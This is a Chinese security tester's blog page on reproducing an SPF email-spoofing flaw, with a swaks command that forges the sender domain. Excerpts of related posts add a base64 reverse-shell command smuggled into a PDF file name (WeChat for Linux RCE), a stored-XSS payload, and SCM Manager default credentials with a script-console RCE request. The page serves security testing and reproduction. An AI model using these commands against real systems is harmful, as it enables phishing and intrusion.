lan1ocのblogSPF 邮件伪造漏洞

SPF 邮件伪造漏洞

发表于2025-09-25|更新于2025-10-23|工作
|浏览量:

搓了个工具

工具地址,写了个tags: - 瞎琢磨 categories: 自研 date: 2025-11-11 --- # [工具地址](https://github.com/la 说明

干中学

以前没接触过的漏洞,干中学了,以后搞测试,多个测试方向

复现

直接用邮件协议测试的工具swaks就行

1
swaks --body "wow" --header "Subject:test" -t "xxx@163.com" -f "test@nbjingyun.com"

测试不用163邮箱的话,一般发不过去

然后邮箱收到邮件

文章作者: lan1oc
文章链接: https://lan1oc.github.io/2025/09/25/%E5%B7%A5%E4%BD%9C/%E5%A4%8D%E6%B5%8B/SPF%20%E9%82%AE%E4%BB%B6%E4%BC%AA%E9%80%A0%E6%BC%8F%E6%B4%9E/1/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 lan1ocのblog!
干中学
cover of previous post
上一篇
 [纯记录用]ldap未授权访问漏洞
纯记录用用到ldap browser,连一下就行
cover of next post
下一篇
有惊无险的应急排查
...
相关推荐
cover
2025-08-21
初步接触微信小程序
小程序位置新版微信不太一样,直接everything搜Applet 1%appdata%\Tencent\xwechat\radium\Applet\packages 然后运行一个小程序,这里就会有文件夹产生,如果运行一个就产生多个文件夹就找有__APP__.wxapkg的文件夹要反编译的就是__APP__.wxapkg 测试(用fine,反编译拿敏感信息)启动被测小程序,然后就会有文件夹生成直接用fine工具,配置好路径然后他就会自动进行提取敏感信息 信息泄露拿到appid和secret的利用方式接口调试工具直接获取token然后就是到运维中心操作就行
cover
2025-09-17
艰难的应急,但定位到了主机,找到了木马
事件背景最近在网信办驻场,大多数时候蛮闲的,基本就是搞文档,然后企业要复测,天天被骚扰麻了,就写exp给他们让他们自测,但是有安全事件就要出去应急。这不就接到一个通报,说是木马远控事件看通报文件,时间跨度是2025-09-15 12:45:12-2025-09-15...
cover
2025-12-20
实战——挖矿病毒应急排查(docker镜像取证与分析)
现场取证定位主机对方有奇安信的设备,直接按照外联ip查到了涉事主机 主机排查,根据威胁情报比对然后查看那个主机进程 1top cpu拉满了,包是挖矿病毒了根据威胁情报显示,只有一个样本,4311文件也找到了该进程接着就是定位文件了 1lsof -c 4311 但是有报错,显示的信息都是docker相关的,然后查看了一下docker容器的资源使用情况 1docker stats 那有问题的就是这个了,停掉该容器之后,cpu占用就下来了,并且也没有4311在运行了,接着就是打包成镜像取证了 导出镜像取证1docker commit dify-web-1 dify-web:20251219 1docker save -o dify-web.tar dify-web:20251219 镜像分析静态分析只读启动镜像先加载镜像 1docker load -i dify-web-backup.tar 然后启动 123456sudo docker run --rm -it \ --read-only \ --network none \ --entrypoint /bin/sh \ ...
cover
2025-08-21
应急响应笔记
定位主机有安全设备直接根据告警的内网ip一键定位 无安全设备那通报给的ip包是公网统一出口ip,就得一台台电脑排查了 排查思路查看外联,定位pid->tasklist定位进程名->找路径->删除->持久化排查 查看外联,定位pid1netstat -ano | findstr ip 红框那一列就是pid tasklist定位进程名1tasklist /FI "PID eq 4992" 找路径任务管理器可以直接打开任务管理器找,在详细信息那里,找到后右键找路径 命令行cmd1wmic process where name="steam.exe" get ExecutablePath 或者 1dir C:\a.exe /s /b powershell1Get-Process steam | Select-Object...
cover
2026-02-10
linux版微信1click rce复现,国产系统通杀
复现随便找个pdf文件,然后文件名是反引号包裹的命令,然后点击就送,尝试过麒麟和鸿蒙系统,全通杀 反弹shell命名限制换linux系统用mv命令绕过了 1mv 1.pdf '`echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODg4OCAwPiYx" | base64 -d | bash`.pdf' 这是弹本地的命令
cover
2026-02-05
书接上回失败的shiro,成功打通,SCM Manager测试,弱口令至rce,但shiro依旧奇怪
前文shiro反序列化失败,然后没思路,就想着不死磕shiro了,从别的思路先来 弱口令是个scm-manager系统,经典弱口令:scmadmin:scmadmin 存储型xsshttp://ip/scm/#repositoryPanel 1<img src=x onerror=console.log(123)> 水报告,想着多弄一个,添加代码库那边测的 后台rce脚本控制台直接一把梭了 123456789101112131415161718POST /scm/api/rest/plugins/script HTTP/1.1Host: X-Requested-With: XMLHttpRequestAccept: */*Referer: /scm/index.htmlCookie: JSESSIONID=49yf5siplceo124fte79hvufjX-SCM-Client: WUIContent-Type: application/x-groovyAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0...
avatar
lan1oc
57qv6I+c54uX572i5LqG
文章
107
标签
31
分类
10
没啥用的仓库
公告
随便写写
目录
  1. 1. 搓了个工具
  2. 2. 干中学
  3. 3. 复现
最新文章
linux版微信1click rce复现,国产系统通杀
linux版微信1click rce复现,国产系统通杀2026-02-10
书接上回失败的shiro,成功打通,SCM Manager测试,弱口令至rce,但shiro依旧奇怪
书接上回失败的shiro,成功打通,SCM Manager测试,弱口令至rce,但shiro依旧奇怪2026-02-05
[记录]尝试shiro有key无链利用,但失败
[记录]尝试shiro有key无链利用,但失败2026-01-13
挖矿病毒事件的后门分析
挖矿病毒事件的后门分析2025-12-30
笔记10——ida_pro mcp的安装
笔记10——ida_pro mcp的安装2025-12-29
©2023 - 2026 By lan1oc
框架 Hexo 7.3.0|主题 Butterfly 5.3.5